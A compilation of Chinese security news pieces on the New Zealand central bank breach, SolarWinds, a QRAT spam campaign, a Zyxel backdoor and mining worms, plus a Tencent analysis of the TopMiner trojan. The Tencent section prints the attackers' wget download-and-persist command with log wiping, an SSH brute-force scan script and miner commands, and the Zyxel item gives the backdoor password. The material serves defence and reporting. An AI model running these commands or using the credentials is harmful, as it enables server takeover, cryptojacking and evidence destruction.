据外媒报道，新西兰央行周日表示，该行的一个数据系统已被一名身份不明的黑客入侵，该黑客有可能已经获取商业和个人敏感信息。这家总部位于惠灵顿的银行在一份声明中说，新西兰储备银行用于共享和存储敏感信息的第三方文件共享服务已被非法访问。 行长Adrian Orr表示，漏洞已经得到控制。该银行的核心功能 “仍然健全和运作。”Orr表示：“我们正在与国内和国际网络安全专家和其他相关部门密切合作，作为我们调查和应对这次恶意攻击的一部分。” “潜在被访问的信息的性质和范围仍在确定中，但可能包括一些商业和个人敏感信息，”Orr补充道。 在银行完成初步调查之前，该系统已经被保护并下线。“了解此次数据泄露事件的全部影响需要时间，我们正在与信息可能被访问的系统用户合作，”Orr说。 该银行拒绝回答寻求更多细节的电子邮件问题。目前还不清楚黑客入侵事件发生的时间，也不清楚是否有任何迹象表明谁是责任人，以及文件共享服务是在哪个国家。 在过去的一年里，新西兰的几个主要机构都成为了网络干扰的目标，其中包括新西兰证券交易所，该交易所的服务器在8月份遭网络黑客攻击，连续崩溃近一周时间。 奥克兰大学计算机科学教授Dave Parry告诉新西兰电台，银行数据泄露事件背后的“罪魁祸首”很可能是另一个政府。“最终如果你是从一种类似于犯罪的角度来的，政府机构是不会支付你的赎金或其他什么的，所以你更感兴趣的可能是从政府对政府的层面来的，”Parry说。           （消息来源：cnBeta；封面来自网络）

Solarwinds 大规模黑客攻击要比预想的要糟糕，近日美国司法部承认由 Microsoft 365 提供的电子邮件服务被入侵。在一份声明中，美国司法部承认有 3% 的邮箱被黑客入侵。不过本周三，司法部发言人 Marc Raimondi 表示：“目前我们没有迹象表明任何机密系统受到影响”。 根据目前的统计数据，已经有超过 1.8 万家企业因 Solarwinds 而被黑客入侵，美国联邦调查局和美国国家安全局都将此次攻击归咎于高级持续性威胁（APT）行为者，很可能是俄罗斯。司法部已根据《联邦信息安全现代化法案》宣布此次黑客攻击为重大事件，并表示将根据联邦机构，国会和公众的需要继续公开相关内容。         （消息来源：cnBeta；封面来自网络）

外媒The Verge援引《华尔街日报》报道称，发现自己受到SolarWinds黑客攻击影响的美国公司和机构名单还在不断增加，他们正在努力应对黑客入侵的一个巨大未知数：攻击程度有多严重。联邦司法系统现在很可能是其中之一，它不会冒任何风险。该机构对此十分担心，尽管目前疫情严重，但法院工作人员现在必须亲自送达敏感文件。 “根据今天宣布的新程序，向联邦法院提交的高度敏感的法院文件（HSDs）将以纸质形式或通过安全的电子设备被接受，并存储在一个安全的独立计算机系统中。这些密封的HSDs将不会上传到CM/ECF。” 这里的信息很清楚：在弄清楚黑客对系统做了什么之前，司法机构不希望其最敏感的文件出现在系统上，并且愿意在提交文件的过程中增加不少摩擦。他们不能再仅仅通过互联网发送，他们必须亲手递送实际的纸张或U盘。 “我们完全理解采取这些措施的实际影响，以及这些措施将给法院带来的行政负担，但是，任何这种负担都比保护有可能被泄露的密封文件的机密性的需要更重要。” 有关文件不一定是日常法庭诉讼的常规密封记录。《华尔街日报》的文章指出，HSDs可能包含调查人员如何处理案件的详细解释，以及目前可能被监视的人的信息。了解这些信息可以帮助某人避免被发现或调查，这就是为什么要保证这些信息的安全。 虽然这些措施表明，司法机构认为不能信任其现有的网络，但公众对法庭记录的访问不会改变。任何本来可以公开的记录仍然会被上传到案件管理和电子案卷系统中。         （消息来源：cnBeta；封面来自网络）

Cybesecurity研究人员今天观察到一个恶意垃圾邮件活动，该活动通过发布美国总统唐纳德·特朗普（Donald Trump）的丑闻假视频来传播远程访问木马（RAT）。 电子邮件的主题为“ GOOD LOAN OFFER !!”，附带一个名为“ TRUMP_SEX_SCANDAL_VIDEO.jar”的Java存档（JAR）文件，一旦被下载，该文件会将Qua或Quaverse RAT（QRAT）安装到系统中。 Trustwave高级安全研究员戴安娜·洛帕（Diana Lopera）在文章中说：“我们怀疑，黑客正试图利用最近结束的总统大选的噱头进行网络犯罪活动。” 最新的恶意活动是八月份发现的基于Windows的QRAT下载器的变体。 感染链从包含嵌入式附件或指向恶意zip文件的链接的垃圾邮件开始，它们均会检索使用Allatori Java混淆器加扰的JAR文件（“ Spec＃0034.jar”）。 第一阶段下载程序将Node.Js平台设置到系统上，下载并执行称为“ wizard.js”的第二阶段下载程序，该程序负责持久获取并运行Qnode RAT（“ qnode-win32-ia32。 js”）。 QRAT是典型的远程访问木马，具有获取系统信息、执行文件操作以及从Google Chrome、Firefox、Thunderbird和Microsoft Outlook等应用程序获取凭据的功能。 这次恶意活动的变化是包含了一个新的弹出警报，该警报会通知受害者正在运行的JAR是用于渗透测试的远程访问软件。这也意味着，一旦用户单击“确定”按钮，该样本的恶意行为就会开始显现。 此外，JAR下载程序的恶意代码被分为不同的随机编号的缓冲区以逃避检测。 其他变化包括JAR文件大小的增加以及为更新的恶意软件链而取消了第二阶段的下载程序，更新的恶意软件链可立即获取QRAT有效负载（现称为“ boot.js”）。 就其本身而言，RAT除了通过VBS脚本负责保持在目标系统上的持久性外，还使用了base64编码对代码进行了加密。 Topera总结说：“自我们首次检查以来，该恶意软件的威胁已大大增强。”他敦促管理员在电子邮件安全网关中阻止传入的JAR。         消息及封面来源：The Hacker News，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

捷克软件开发公司JetBrains今天声明，否认 《纽约时报》和《华尔街日报》 刊登的JetBrains涉嫌参与SolarWinds黑客攻击事件的报道。 调查人员认为，黑客将JetBrains的产品命名为TeamCity，该产品是用于将组件组装到软件应用程序中的CI / CD（持续集成/持续开发）服务器。 JetBrains首席执行官马克西姆·沙菲罗夫（Maxim Shafirov）发表博客表示： “ SolarWinds是我们TeamCity的用户，这是用作构建软件的持续集成和部署系统 。” 他补充说：“ SolarWinds或政府机构尚未与我们联系，提供有关违规的任何详细信息。我们会给予充分的合作。” 但俄罗斯JetBrains首席执行官并没有完全排除其产品被SolarWinds黑客滥用的可能性。 这位高管说：“要强调TeamCity是需要适当配置的产品。如果TeamCity被滥用，那很可能是由于配置错误，而不是特定的漏洞。” 我们仍不清楚所谓的JetBrains违规行为。 正如ETH安全研究中心研究员Stefan Soesanto早些时候在Twitter表示的那样：在对JetBrains承担责任之前，我们需要澄清更多细节。       消息及封面来源：ZDnet，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

据外媒报道，美FBI、NSA、网络安全与基础设施安全局(CISA)和国家情报总监办公室(ODNI)于当地时间周二发表联合声明称，SolarWinds的黑客行为“可能来自俄罗斯”。这是这四家机构首次将网络攻击归咎于俄罗斯。 声明称：“这项研究表明，一个高级持续性威胁(APT)行为者可能来自俄罗斯，其对最近发现的大部分或全部政府和非政府网络正在进行的网络攻击负有责任。目前，我们认为，这是一项情报收集工作，而且将继续如此。” 美国务卿迈克·蓬佩奥上月曾在接受新闻采访时表示，SolarWinds袭击很可能来自俄罗斯，但直到现在都还没有做出正式声明。 最新的这份联合声明则补充称，在1.8万家受影响的公司和机构中迄今发现只有10家美国政府机构受到系统后续活动的影响。 由FBI、NSA、CISA、ODNI组成的网络统一协调小组仍在继续调查这起始于2020年的黑客入侵事件，当时黑客侵入了总部位于德克萨斯州奥斯汀的SolarWinds的IT管理软件。 据报道，此次入侵包括美国财政部高层使用的电子邮件系统。       （消息及封面来源：cnBeta）

一、概述 腾讯主机安全（云镜）检测到挖矿木马TopMiner近期攻击十分活跃，该木马通过SSH弱口令爆破进行攻击入侵，会清除竞品挖矿木马，同时会使用爆破工具在内网横向传播。根据其挖矿钱包收益估算，约有1.5万台服务器被该团伙控制挖矿。由于其使用的挖矿木马名为top，腾讯安全将其命名为TopMiner挖矿木马。 TopMiner挖矿团伙针对SSH弱口令进行爆破攻击，成功后执行命令下载恶意shell脚本，并将启动脚本写入crontab定时任务进行持久化，shell脚本继续下载挖矿木马nginx、top启动挖矿。 木马入侵系统后，还会下载SSH爆破程序sshd，扫描到网络中开放22端口的Linux系统机器后，通过实时更新的密码字典对其root账号进行爆破攻击。攻击者在爆破攻击程序代码留下注释：”宽带充足基本可以12个小时扫描全球”，气焰可谓十分嚣张。 分析过程中，我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。 腾讯云主机安全（云镜）支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警，通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险，具有很强的实战性。腾讯安全专家建议企业安全运维人员尽快解决服务器配置弱口令的风险。 自查处置建议 腾讯安全专家建议企业安全运维人员对服务器进行检查，清理以下相关项： 文件和进程： /tmp/.top-unix/nginx /tmp/.ICE-unix1/top /srv/.ICE-unix1/sshd /srv/.ICE-unix1/scan.sh /etc/ipv6_addrconf /etc/crypto Crontab定时任务： /tmp/.top-unix/top            -o              stratum+tcp://pool.supportxmr.com:8080               -u 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN -p X /tmp/.top-unix/nginx           -o           stratum+tcp://mine.c3pool.com:15555                 -u 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL -p X /etc/crypto 腾讯安全响应清单 腾讯安全系列产品可针对TopMiner挖矿木马攻击传播的各个环节进行阻断拦截： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）TopMiner挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）TopMiner挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）TopMiner木马关联的IOCs已支持识别检测； 2）检测SSH弱口令爆破攻击。 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀TopMiner木马程序； 2）主动检测系统是否存在SSH弱口令并提示； 3）检测SSH弱口令爆破攻击。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测TopMiner木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta   二、详细分析 2.1、攻击入侵方式 病毒通过SSH弱口令爆破入侵系统，随后执行恶意命令下载脚本crypto，并将其写入crontab定时任务。 bash -c cd /etc wget -P /etc http://103.45.183.12:808/crypto chmod 0777 crypto nohup /etc/crypto > /dev/null 2>&1 & chattr +i /etc/crypto echo "/etc/crypto">>/etc/rc.local echo "/etc/crypto">>/etc/crontab echo > /var/log/wtmp history -c crypto会检查自己的挖矿进程/tmp/.ICE-unix1/top是否存在，如果不存在会判断是否有竞品挖矿木马存在，然后会杀掉竞品挖矿木马进程kswapd0、rsync、tsm、work32、work64、go、joseph，然后从C2服务器下载挖矿木马top并启动挖矿。 Top挖矿木马下载地址为：http[:]//xiazai.qq360bidu.me:808/top 挖矿使用矿池：91.121.140.167:443 挖矿使用钱包： 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL 根据其矿池算力平均340KH/s，可推算该挖矿团伙已控制约1.5万台服务器进行挖矿，平均每天获利约154美元（0.17个门罗币），折合人民币约1000元。 2.2、横向移动 木马入侵系统后会接着下载端口爆破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。 观察文件被创建的时间，除了爆破程序sshd和用户名列表user.txt是6月份被修改过（可能是初次创建），其他文件操作时间均为12月，并且密码字典文件password.txt的修改时间就在近期。可见其感染系统后，攻击模块一直处于活跃状态，并且攻击对象、密码字典在持续更新扩充。 其中一个待爆破IP列表里有超过19万个IP地址： 爆破用户名：root，其中一个密码字典有1700余个密码，部分如下： 攻击时脚本scan.sh负责启动扫描进程masscan和爆破进程sshd，脚本代码如下： #!/bin/bash yum install masscan -y apt-get install masscan -y if [ $# -ne 4 ]; then echo "脚本默认安装扫描工具为masscan" echo "运行参数应为 ./scan.sh IP范围 端口 扫描线程 爆破线程" echo "IP范围支持1.0.0.0-1.255.255.255或 1.0.0.0/8这种" echo "扫描线程取1-100万左右,G口肯定是30-100万跑,线程越低结果越准,宽带充足基本可以1 2个小时扫描全球" exit fi echo '' > a.txt masscan $1 -p $2 --rate $3 --excludefile pingbi.txt -oL a.txt echo '' > ip.txt cat a.txt | grep -B0 open | grep -oP '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -u > ip.txt./sshd ip.txt user.txt password.txt $2 $4   在实际攻击过程中，针对22端口进行爆破，爆破线程被设置为1000。 ./sshd ips.txt user.txt password.txt 22 1000   2.3、该团伙使用的其他木马 除了shell脚本、挖矿木马、爆破程序之外，我们在黑客控制的服务器上还发现了具有DDoS和远程shell功能的Kaiji木马，以及backdoor木马cnet2。 挖矿木马“ipv6_addrconf”、“systemd”、“top”为挖矿程序XMRig编译，其中“ipv6_addrconf”、“systemd”通过加UPX壳保护。 backdoor木马“cnet2”，具有监听端口，连接服务端，下载文件，执行远程命令等功能。 Kaiji木马“3”、“amd64”、“php-fpm”采用Go语言编写，具有DDoS攻击、远程shell以及SSH爆破攻击等功能，详情可参考腾讯安全此前的分析报告 https://s.tencent.com/research/report/1168.html。             IOCs IP 103.45.183.12（ZoomEye搜索结果） Domain xiazai.qq360bidu.me URL http[:]//xiazai.qq360bidu.me:808/top http[:]//103.45.183.12:808/crypto MD5 amd64 c491074d7723e6a6b1b1b8fb002f09b6 cnet2 9d2681b69116f866477dbe3bda0cbf49 top f74d1803befb993040aab866dbe6f12f systemd 640c6f1e7a5efdba49aeaa06d0dac304 crypto 9f0993ac09182d9ec08d1c562d2cfcbd sleep fbf0dccc0d9e674858d63e521eb122a0 sshd 15a653e96bada2fc2e47db59d863f4ff ipv6_addrconf b641d939b7cf70606ff5826f68c47d29 钱包： 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL

据《纽约时报》报道，美国网络司令部司令兼美国国安局局长保罗·中曾根在选举日曾报告说，反对俄罗斯干预总统竞选的战斗已经取得了重大成功，并暴露了对方的在线武器、工具和谍报技术。他对记者说：“我们拓宽了行动范围，感觉我们现在的情况非常好。”八周后， 中曾根将军和其他负责网络安全的美国官员现在被他们至少9个月来所忽略的事情所消耗：现在被认为影响到多达250个联邦机构和企业的黑客攻击，俄罗斯的目标不是选举系统，而是美国政府的其他部门和许多美国大公司。 入侵事件曝光三周后，美国官员仍在试图了解俄罗斯人的所作所为，究竟是简单的在美国官僚系统内部进行间谍活动，还是将“后门”接入政府机构、大公司、电网以及开发和运输新一代核武器的实验室。 《纽约时报》认为，至少这些事件已经引发了美国政府和私营部门网络易受攻击的警报，并提出了美国国家网络防御系统为何失败的问题。 鉴于此次漏洞并不是由任何一个分担网络防御责任的政府机构–军方的网络司令部和国家安全局（均由中曾根将军掌管）以及国土安全部–发现的，而是由一家私营网络安全公司FireEye发现的，因此这些问题显得尤为紧迫。 “这看起来比我最初担心的要糟糕得多，”弗吉尼亚州民主党参议员、参议院情报委员会排名成员马克·华纳说。“它的规模不断扩大。很明显，美国政府错过了它。”“而如果FireEye没有站出来，”他补充说，“我不确定我们到今天还能不能完全意识到这一点。” 对调查情报机构认为是俄罗斯S.V.R.情报部门行动的关键人物的采访显示了这些要点： 漏洞的范围比最初认为的要大得多。最初的估计是，俄罗斯只向18000个政府和私人网络中的几十个网络发起攻击，他们在德克萨斯州一家名为SolarWinds的公司制造的网络管理软件中插入代码，从而获得了访问权。但随着亚马逊和微软等提供云服务的企业深入挖掘证据，现在看来，俄罗斯利用供应链的多个层面获得了多达250个网络的访问权限。 黑客从美国境内的服务器进行管理入侵，利用国家安全局从事国内监控的法律禁令，躲过了国土安全部部署的网络防御措施。 美国网络司令部和国家安全局在外国网络深处放置的“预警 ”传感器，用于侦测酝酿的攻击，显然是失败的。目前也还没有迹象表明，有任何人类情报机构向美国发出了黑客攻击的警报。 美国政府对选举防御的重视虽然在2020年至关重要，但可能转移了资源和注意力，使其无法解决保护软件“供应链”等酝酿已久的问题。在私营部门，也是如此，像FireEye和微软这样专注于选举安全的公司，现在也透露他们被攻破，成为更大的供应链攻击的一部分。 据现任和前任员工以及政府调查人员称，被黑客用作攻击渠道的SolarWinds公司，其产品的安全性能历来不高，因此很容易成为目标。该公司首席执行官 Kevin B. Thompson已经回避了他的公司是否应该发现入侵的问题。 部分被入侵的SolarWinds软件是在东欧设计的，美国调查人员目前正在研究入侵是否源自那里，因为俄罗斯情报人员在那里根深蒂固。 攻击背后的意图仍被掩盖。但随着新政府在不到三周后上任，一些分析人士表示，俄罗斯人可能试图动摇华盛顿对其通信安全的信心，并展示他们的cyberarsenal，以便在核武谈判之前获得对当选总统拜登的影响力。 “我们仍然不知道俄罗斯的战略目标是什么，”曾在奥巴马政府期间担任国土安全部高级网络官员的Suzanne Spaulding说。“但我们应该关注的是，这其中的一部分可能超出了侦察的范围。他们的目标可能是让自己处于对新政府有影响力的地位，就像拿枪指着我们的脑袋，以阻止我们采取行动对抗普京。” 日益增长的打击名单 美国政府显然是攻击的主要焦点，财政部、国务院、商务部、能源部和五角大楼的部分机构都被证实被渗透。国防部坚持认为对其系统的攻击是不成功的，尽管它没有提供证据。 但黑客攻击也攻破了大量的公司，其中许多公司尚未出面。SolarWinds被认为是俄罗斯在黑客攻击中使用的几家供应链供应商之一。微软截至12月17日已统计出40名受害者，起初它说自己没有被入侵，但本周才发现自己被入侵了–而且其软件的经销商也被入侵了。亚马逊情报团队此前未报告的评估发现，受害者人数可能是其五倍之多，不过官员警告说，其中一些人可能被重复计算。 官员们在公开场合表示，他们不相信来自俄罗斯S.V.R.的黑客攻破了包含敏感通信和计划的机密系统。但私下里，官员们表示，他们仍不清楚可能被窃取的内容。 他们说，他们担心黑客可能从联邦能源监管委员会等受害者那里窃取了微妙但不保密的数据，包括 “黑启动(Black-Start) “，即美国计划在大停电时如何恢复电力的详细技术蓝图。 这些计划将给俄罗斯提供一个目标系统的命中名单，以防止其在2015年在乌克兰发动的攻击中恢复电力，在深冬时关闭电力6小时。莫斯科早就在美国电网中植入了恶意软件，美国也对俄罗斯做了同样的事情，以示威慑。 供应链受损 到目前为止，调查的一个主要焦点是SolarWinds，这家位于奥斯汀的公司，其软件更新被黑客入侵。但美国国土安全部的网络安全部门认为，黑客也是通过其他渠道工作的。而上周，另一家安全公司CrowdStrike透露，它也被同样的黑客盯上了，但没有成功，但通过一家转售微软软件的公司。 由于经销商经常受托设置客户的软件，他们–像SolarWinds一样–可以广泛进入微软客户的网络。因此，他们可以成为俄罗斯黑客的理想木马。情报官员对微软没有更早发现这次攻击表示愤怒；该公司周四表示，黑客查看了其源代码，但没有透露其哪些产品受到影响，也没有透露黑客在其网络内部停留了多长时间。 Obsidian Security公司创始人Glenn Chisholm表示：“他们瞄准了供应链中最薄弱的环节，并通过我们最信任的关系进行攻击。” 对SolarWinds现员工和前员工的采访表明，它迟迟没有将安全作为优先事项，即使其软件被美国首屈一指的网络安全公司和联邦机构采用。员工们表示，在受过培训的会计师和前首席财务官汤普森先生的领导下，公司对业务的每一个部分都进行了检查，以节约成本，而普通的安全实践则因其费用而被摒弃。他的方法帮助SolarWinds的年利润率从2010年的1.52亿美元增加了近三倍，到2019年超过4.53亿美元。 但其中一些措施可能会使公司及其客户面临更大的攻击风险。SolarWinds将其大部分工程转移到捷克共和国、波兰和白俄罗斯的办公室，在那里，工程师可以广泛访问俄罗斯特工入侵的Orion网络管理软件。该公司仅表示，对其软件的操纵是人为黑客所为，而非计算机程序。该公司没有公开处理内部人员参与入侵的可能性。 《纽约时报》最近几周接触的SolarWinds客户中，没有一个人知道他们依赖的是在东欧维护的软件。许多人表示，他们甚至直到最近才知道自己使用的是SolarWinds软件。 即使在整个联邦网络中安装了它的软件，员工们说，SolarWinds只是在2017年，在新的欧洲隐私法的惩罚威胁下，才加装了安全防护措施。员工说，直到那时，SolarWinds才聘请了第一位首席信息官，并安装了一位 “安全架构 “副总裁。 SolarWinds的前网络安全顾问Ian Thornton-Trump表示，他当年曾警告管理层，除非它对内部安全采取更积极的态度，否则网络安全事件将是 “灾难性的”。在他的基本建议被忽视后，桑顿-特朗普先生离开了公司。 SolarWinds拒绝回应有关其安全性是否充分的问题。在一份声明中，它说它是 “高度复杂、复杂和有针对性的网络攻击的受害者”，并正在与执法部门、情报机构和安全专家密切合作进行调查。 但安全专家指出，在发现俄罗斯攻击后数天，SolarWinds的网站才停止向客户提供受影响的代码。 攻大于守 近年来，数十亿美元的网络安全预算流向了进攻性的间谍活动和先发制人计划，也就是中曾根将军所说的 “超前防御 “的需要，通过入侵对手的网络，尽早了解他们的行动，并在必要时，在他们发动攻击之前，在自己的网络内部进行反击。但这种方法虽然被誉为早就应该采取的先发制人的策略，但却错过了俄罗斯的漏洞。 据FireEye报道，俄罗斯人通过从美国境内的服务器发动攻击，在某些情况下，他们使用的计算机与受害者在同一个城镇或城市，利用了国家安全局的权力限制。国会没有赋予该机构或国土安全局任何进入或保卫私营部门网络的权力。正是在这些网络上，S.V.R.特工们不太小心，留下了他们入侵的线索，FireEye最终得以发现。 通过将自己插入到SolarWinds的猎户座更新中，并使用自定义工具，他们还避免了跳过国土安全局在政府机构中部署的 “爱因斯坦 “检测系统的警报，以捕捉已知的恶意软件，以及所谓的C.D.M.程序，该程序是明确设计用来提醒机构注意可疑活动的。 一些情报官员质疑，政府是否如此专注于选举干预，以至于在其他地方制造了空子。情报机构几个月前得出结论，认为俄罗斯已经确定无法渗透到足够多的选举系统来影响选举结果，而是将注意力转移到转移可能剥夺选民权利的勒索软件攻击，以及旨在播撒不和谐的影响行动，引发对系统完整性的怀疑，改变选民的想法。 早在2019年10月就开始的SolarWinds黑客攻击事件，以及对微软经销商的入侵，让俄罗斯有机会攻击多个联邦机构中最脆弱、最不设防的网络。 中曾根将军拒绝接受采访。但国家安全局发言人查尔斯-K-斯塔德兰德说。“我们不认为这是一个’非此即彼’的权衡。选举安全工作中构建的行动、见解和新框架，对国家和美国政府的网络安全态势有着广泛的积极影响。” 事实上，美国似乎已经成功说服了俄罗斯，即旨在改变选票的攻击将促使俄罗斯采取代价高昂的报复行动。但随着入侵规模的凸显，美国政府显然未能说服俄罗斯，执行对联邦政府和企业网络的大范围黑客攻击会有相当的后果。 把黑客“赶出去” 情报官员说，他们可能要花几个月甚至几年的时间才能对黑客攻击事件有一个全面的了解。 自2017年提取一名克里姆林宫高层线人以来，中情局对俄罗斯行动的了解已经减少。而情报官员说，S.V.R.通过避免可能向国家安全局暴露机密的电子通讯，一直保持着世界上最有能力的情报部门之一。 对S.V.R.最好的评估来自荷兰人。2014年，为荷兰情报和安全总局工作的黑客刺破了该组织使用的电脑，至少观察了一年，并一度将其拍下。 正是荷兰人在2014年和2015年帮助提醒白宫和国务院他们的系统遭到S.V.R.黑客攻击，上个月，他们抓住了两名被指控渗透到荷兰科技公司的S.V.R.特工，并将其驱逐出荷兰。虽然该组织并不以破坏性著称，但其渗透到的计算机系统中却很难驱逐。 当S.V.R.闯入国务院和白宫的非机密系统时，时任国家安全局副局长的理查德-莱杰特说，该机构进行的数字相当于“徒手搏斗”。有一次，S.V.R.获得了调查人员用来连根拔除俄罗斯后门的NetWitness Investigator工具的访问权限，以这样的方式操纵它，使黑客继续逃避检测。 调查人员说，他们会认为自己已经把S.V.R.“赶出去”了，却发现这群人从另一扇门“爬了进来”。 一些安全专家说，把这么多庞大的联邦机构赶出S.V.R.可能是徒劳的，唯一的出路可能是关闭系统，重新开始。其他人说，在大流行期间这样做将是非常昂贵和耗时的，新政府将不得不努力识别和控制每一个受损的系统，然后才能校准响应。 “S.V.R.是故意的，他们很复杂，而且他们没有像我们在西方国家那样的法律约束，”前政府情报分析师亚当-达拉说，他现在是安全公司Vigilante的情报总监。他补充说，制裁、起诉和其他措施都没能阻挡住S.V.R.，它已经显示出它可以迅速适应。 “他们现在正在非常密切地观察我们，”达拉说。“而且他们会相应地进行调整。”         （消息来源：cnBeta，封面来自网络）

超过 10 万台 Zyxel 防火墙、VPN 网关和接入点控制器中包含一个写死（hardcoded）的管理员后门帐号，能够让攻击者通过 SSH 接口或者网页管理员控制面板对设备进行 root 级别访问。 这个后门帐号是来自荷兰 Eye Control 安全研究团队发现的，被认为是最糟糕的漏洞，建议设备拥有者在时间允许的情况下尽快更新系统。 安全专家警告说，从DDoS僵尸网络运营商到国家支持的黑客组织和勒索软件团伙，任何人都可以滥用这个后门账户来访问脆弱的设备，并转入内部网络进行额外的攻击。 据悉，Zyxel 大部分主打产品均存在这个漏洞，受影响的产品型号包括：“Advanced Threat Protection (ATP) 系列：主要用于防火墙 Unified Security Gateway (USG) 系列：主要用于混合防火墙或者 VPN 网关 USG FLEX 系列：主要用于混合防火墙或者 VPN 网关 VPN 系列：主要用于 VPN 网关 NXC 系列：主要用于 WLAN 接入点控制” 这些设备很多都是在公司网络的边缘使用，一旦被入侵，攻击者就可以转而对内部主机发起进一步的攻击。目前只有ATP、USG、USG Flex和VPN系列的补丁。根据Zyxel的安全咨询，NXC系列的补丁预计将在2021年4月推出。 在安装补丁之后，Eye Control 表示可以删除后门帐号–用户名为“zyfwp”，密码为“PrOw!aN_fXp”。 研究人员表示，该账户拥有设备的root权限，因为它被用来通过FTP向其他相互连接的Zyxel设备安装固件更新。           （消息及封面来源：cnBeta）  

自12月初以来，一种新发现的、基于Golang的自我传播的恶意软件一直在Windows和Linux服务器上主动运行XMRig加密货币矿机程序。Intezer安全研究员Avigayil Mechtinger透露，这个多平台的恶意软件还具有蠕虫功能，可以通过用弱密码强行使用面向公众的服务(即MySQL、Tomcat、Jenkins和WebLogic)传播到其他系统。 自首次发现该蠕虫以来，背后的攻击者一直通过其命令和控制（C2）服务器积极更新该蠕虫的功能，这暗示着该蠕虫依然是一个积极维护的恶意软件。 C2服务器用于托管bash或PowerShell滴管脚本（取决于目标平台），一个基于Golang的二进制蠕虫，以及部署的XMRig矿工，以在受感染的设备上偷偷挖掘不可追踪的Monero加密货币（门罗币）。 该蠕虫通过使用密码喷洒式攻击和硬编码凭证列表扫描和强行通过MySQL、Tomcat和Jenkins服务传播到其他计算机。该蠕虫的旧版本还试图利用CVE-2020-14882 Oracle WebLogic远程代码执行漏洞。一旦它成功入侵其中一台目标服务器，就会部署加载器脚本（Linux的ld.sh和Windows的ld.ps1），该脚本的载荷会同时投放XMRig矿工程序和基于Golang的蠕虫二进制代码。 如果恶意软件检测到受感染的系统正在监听52013端口，它将自动杀死自己。如果该端口未被使用，蠕虫将打开自己的网络套接字。 要防御这种新的多平台蠕虫发动的蛮力攻击，网络管理员应该限制登录条件，并在所有暴露在互联网上的服务上使用难以猜测的密码，以及尽可能使用双因素认证。       （消息来源：cnBeta；封面来自网络）